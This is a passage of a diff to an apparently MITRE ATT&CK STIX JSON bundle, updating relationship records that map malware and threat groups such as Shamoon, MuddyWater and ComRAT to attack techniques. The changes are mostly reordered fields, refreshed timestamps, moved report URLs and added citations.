- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
}
],
"source_ref": "malware--80a014ba-3fef-4768-990b-37d8bd10d7f4",
"relationship_type": "uses",
"target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-06-29T13:27:46.666Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106748,12 +107923,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--216c15b0-3091-49f2-ba85-356d56265671",
@@ -106916,12 +108091,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-comnie-continues-target-organizations-east-asia/"
}
],
- "source_ref": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--f4c80d39-ce10-4f74-9b50-a7e3f5df1f2e",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--6e422de0-d8c4-41f8-acdd-d433e14e32a3",
@@ -107217,7 +108392,7 @@
{
"id": "relationship--023ff141-8ed7-4132-85a0-494fe075236b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017)",
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017) [Magic Hound](https://attack.mitre.org/groups/G0059) used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.(Citation: Check Point Rocket Kitten)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -107226,13 +108401,18 @@
"source_name": "Unit 42 Magic Hound Feb 2017",
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
+ },
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
}
],
"source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-16T20:12:11.427Z",
+ "modified": "2020-07-04T22:55:43.624Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -107307,16 +108487,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:25:46.717Z",
+ "modified": "2020-04-21T23:09:31.590Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -107534,7 +108714,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -107543,7 +108723,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.284Z",
+ "modified": "2020-04-16T19:41:40.647Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108244,27 +109424,32 @@
{
"id": "relationship--af9347a3-00a9-4ece-b075-8c55bd4f4b9b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "Once [Shamoon](https://attack.mitre.org/software/S0140) has access to a network share, it enables the RemoteRegistry service on the target system. It will then connect to the system with RegConnectRegistryW and modify the Registry to disable UAC remote restrictions by setting SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy to 1.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
},
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.365Z",
+ "modified": "2020-05-29T18:11:24.821Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -108281,12 +109466,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--55df3b40-b130-4313-9064-6b0fc56564d0",
@@ -108382,7 +109567,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
"type": "relationship",
- "modified": "2020-03-29T20:10:19.367Z",
+ "modified": "2020-07-09T13:54:28.892Z",
"created": "2017-05-31T21:33:27.021Z"
},
{
@@ -108493,16 +109678,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b",
"type": "relationship",
- "modified": "2020-03-17T03:05:29.194Z",
+ "modified": "2020-04-21T23:09:31.619Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108587,16 +109772,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:55:39.135Z",
+ "modified": "2020-04-21T23:09:31.587Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108734,7 +109919,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -108743,7 +109928,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.289Z",
+ "modified": "2020-04-16T19:41:40.815Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -108791,22 +109976,27 @@
{
"id": "relationship--af74c0ec-0bbe-4538-a3a3-1e967afd3d51",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) can add a certificate to the Windows store.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.154Z",
+ "modified": "2020-06-16T20:51:14.280Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -109278,12 +110468,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6",
- "relationship_type": "revoked-by",
- "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6",
+ "relationship_type": "revoked-by",
+ "target_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d"
},
{
"id": "relationship--3dd745f5-1c0c-4376-8850-89679fcd4e31",
@@ -109695,16 +110885,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-17T00:28:02.240Z",
+ "modified": "2020-04-21T23:09:31.573Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -109846,7 +111036,7 @@
{
"id": "relationship--ce7b27ac-fff6-4d3c-bceb-50c16f462552",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1086) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve and execute additional [PowerShell](https://attack.mitre.org/techniques/T1059/001) payloads from the C2 server.(Citation: FireEye MuddyWater Mar 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -109861,7 +111051,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.151Z",
+ "modified": "2020-03-31T22:21:47.793Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -109901,9 +111091,9 @@
],
"source_ref": "malware--c541efb4-e7b1-4ad6-9da8-b4e113f5dd42",
"relationship_type": "uses",
- "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"type": "relationship",
- "modified": "2019-06-24T19:03:52.715Z",
+ "modified": "2020-06-12T17:37:53.694Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110088,16 +111278,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.630Z",
+ "modified": "2020-04-21T23:09:31.616Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110413,12 +111603,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--87b74ba7-99c4-464c-86d2-1dd8c8b578b1",
@@ -110554,16 +111744,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.641Z",
+ "modified": "2020-04-21T23:09:31.607Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -110671,7 +111861,7 @@
{
"id": "relationship--0a65c303-52a6-4624-a8fb-fc7448429139",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Winnti](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)",
+ "description": "[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -110686,7 +111876,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-04-30T18:45:04.769Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -110797,12 +111987,12 @@
"url": "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf"
}
],
- "source_ref": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-05-31T21:33:27.048Z"
+ "created": "2017-05-31T21:33:27.048Z",
+ "source_ref": "intrusion-set--59140a2e-d117-4206-9b2c-2a8662bd9d46",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5"
},
{
"id": "relationship--98d076a5-9640-4337-a5a0-27c0c8a3374b",
@@ -110855,7 +112045,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -110864,7 +112054,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b",
"type": "relationship",
- "modified": "2020-03-17T01:33:43.518Z",
+ "modified": "2020-04-16T19:41:40.702Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -111111,22 +112301,27 @@
{
"id": "relationship--1782abeb-8d28-42a1-8abe-c137f23b282c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)",
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf",
+ "source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "source_name": "NorthSec 2015 GData Uroburos Tools"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-20T16:39:42.446Z",
+ "modified": "2020-06-29T13:26:01.392Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -111180,16 +112375,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.640Z",
+ "modified": "2020-04-21T23:09:31.596Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -111532,15 +112727,20 @@
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malware via COM and Outlook.(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"id": "relationship--319dbc0e-5026-4796-bfd9-43ef3d30eb8d",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
"type": "relationship",
- "modified": "2020-03-20T15:50:57.899Z",
+ "modified": "2020-05-21T12:58:00.382Z",
"created": "2019-01-30T17:33:40.954Z"
},
{
@@ -111667,12 +112867,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--de840f88-b9d0-4f7e-b5c0-b666faa2d92f",
@@ -111835,9 +113035,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -111849,7 +113049,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.800Z",
+ "modified": "2020-06-02T16:14:00.468Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -111908,16 +113108,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.147Z",
+ "modified": "2020-05-14T15:14:33.554Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -112044,12 +113243,12 @@
"url": "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--33e3573b-0f18-417c-be17-727863fc21ec",
@@ -112128,12 +113327,12 @@
